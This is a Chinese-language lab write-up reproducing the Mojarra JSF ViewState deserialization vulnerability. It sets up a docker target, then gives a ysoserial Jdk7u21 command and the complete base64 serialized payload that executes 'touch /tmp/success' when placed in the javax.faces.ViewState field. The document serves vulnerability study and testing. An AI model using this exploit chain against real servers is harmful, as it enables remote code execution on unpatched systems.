Mojarra JSF ViewState 反序列化漏洞
漏洞详情
JavaServer Faces (JSF) 是一种用于构建 Web 应用程序的标准,Mojarra是一个实现了JSF的框架。在其2.1.29-08、2.0.11-04版本之前,没有对JSF中的ViewState进行加密,进而导致攻击者可以构造恶意的序列化ViewState对象对服务器进行攻击。
环境搭建
靶场:192.168.4.10_ubuntu
执行如下命令启动一个使用了JDK7u21和mojarra 2.1.28的JSF应用:
#docker-compose up -d
环境启动后,访问`http://your-ip:8080`即可查看到demo页面。
漏洞复现
JSF的ViewState结构如下:
根据这个结构,我们使用ysoserial的Jdk7u21利用链来生成一段合法的Payload:
```
$java -jar ysoserial.jar Jdk7u21 "touch /tmp/success" | gzip | base64 -w 0
H4sIAAAAAAAAA61WSW8cRRR+NWPPjIdxvMRrQpIJSfAC6XZsjxfGkHjBycAYW4zjSMzBlHvKnk56S3e13UYiN34AQuEfAJEwh1xIlANSxC3hgoQECooEF27AIULiwvKqu+2xbBNPQlrqruq31Xuvvnr1Nn6FWseG9st0lUouVzUprxpXWOkCdcoFxn/Qvn/n+sPeoxEAz4amilTIvzP1wfWPb98ajCLfWksBQOPZcyCeCFp9RTF1yXENybRXJGpRpcwkj2rUkFSDM9ugmuQ5GlckblNPmme6pVHOnByOdZdm7xobnw9EIZaD+kXVKDGDv+XqS8zOwYFFVDAcjfEc0r0iJBeX1jlTzBJzOESLxYkixBYVjTr421zMC7dlXHZFnhS0bB5qFw2qM2Ru4xW4rRoryGxaNF1uuXzONi1mc1UYbQsERexyhZ71LBHrP/i4tr/wm391tq6s/DgsEiZ4EaRHihMbj9r/jCXmfwrJsRv3/r7zFbL7YTQJUXghDsNxOBWHFwk0OsxWqbbAbEc1jYu5KQLkDQL1k6bhcGrwBaq5rPaL9EePPnz4+2sEYmOqoXKcRLt7FgjUTGIWCDTgNrIgX/N0SUNKc95U0CxF4/gfEmt4WXUIHCxwd2k+zOkcXddMWiKQyhkGs/2UMRTK5NcdM3BOtgIZJ0jIeVpaYdw5uYeVLIE6f7OWTVsnYHfnERMyYkJGTMgBJmQfE/ImJmQfE/LU7Ey2uKe0rlVkA3/U95gtF8Ip5Zi3C9QoaczOipQkSqbi6ogfAqefaHlULQd2MPyJ/+8MgeTrnsIsQXPi0EXg0yfLx74elLguT83PjHuqk0MS5aa9v1JVOVRDcwIHT+MFgXiYSwLjzyKTBdO1FTatChinQgRK4pCmIAnPxaGbwMBTAJbAuWp3xHYNrupMHl9yEOIK37REoMUvFqpZcd4/baPVWt60tIUWAsf2iQW3aEzRwlLQVKlqbwdOxqEXc4aC4T+B1u6e/C6xbApehtNJeAkkrBjcdJVyWua6hV4rCnOcBPRh0WAeUwh0de8unttNYpkUKmiyHwaEyUGsYgVOlSsz1Arrz9FKVHNrWGzODAwPDA6O9I/0ZYYGRzIE0vnHS2ThOESwgqJX+B6CWojhGBeVFxI+DcGAX3E1yTgSHGt7bwG56YvU4zfmE/vgAH5TgQA0wAiOWBihBaWE8ll8o4K2UzHjK6YDZqgoZq3Q5vMJtEMHanTiPPBRmD0cms351D3MjvpmewPmnmafhyOoIWZH4RguX1kgAT1bQZ9EjpBq+AyiJH8b5OYzX0Lm0k1fccgPigiJtL/+cWjCMYmsCJyARqhzr8I1tAXku60b67C4sVrj0B6Hjjh0VntjXf1F/W1MP9/xbG6s6LRp7rqhTu17Q6FWNbXjEIETVZjC0Ctwn126zJT/Pvv7nd/H4phUj+NXd+C42ecf9L8t23a3TeyuxaEGT5VtrRHwnPd9TBwR/nsSlmNp6+Ku9GbeZq8oYpZstqxh0BIedW/9564H6W8aJ+9HgOSBlDluRyU7oaScM1ZxU7eXcs/CTrFfdImb1qhhmNyXkca3prsUL977o6H1/rVPIhDJQ0pnAjg+0rBba9jWrWGxwZ6uhq9b2O817eoF/eV3NLaoUht/cPfrtne/xaMxDUmxXdNY4U1sPut42WZO2dRKnhX2uqm1hOh8Rfo4JJYzNEOH+kbEyUl4q/Y+GYXK41nev1mDNoKQCwAA
```
然后,我们提交表单并抓包,修改其中`javax.faces.ViewState`字段的值为上述Payload(别忘了URL编码):
`touch /tmp/success`已成功执行: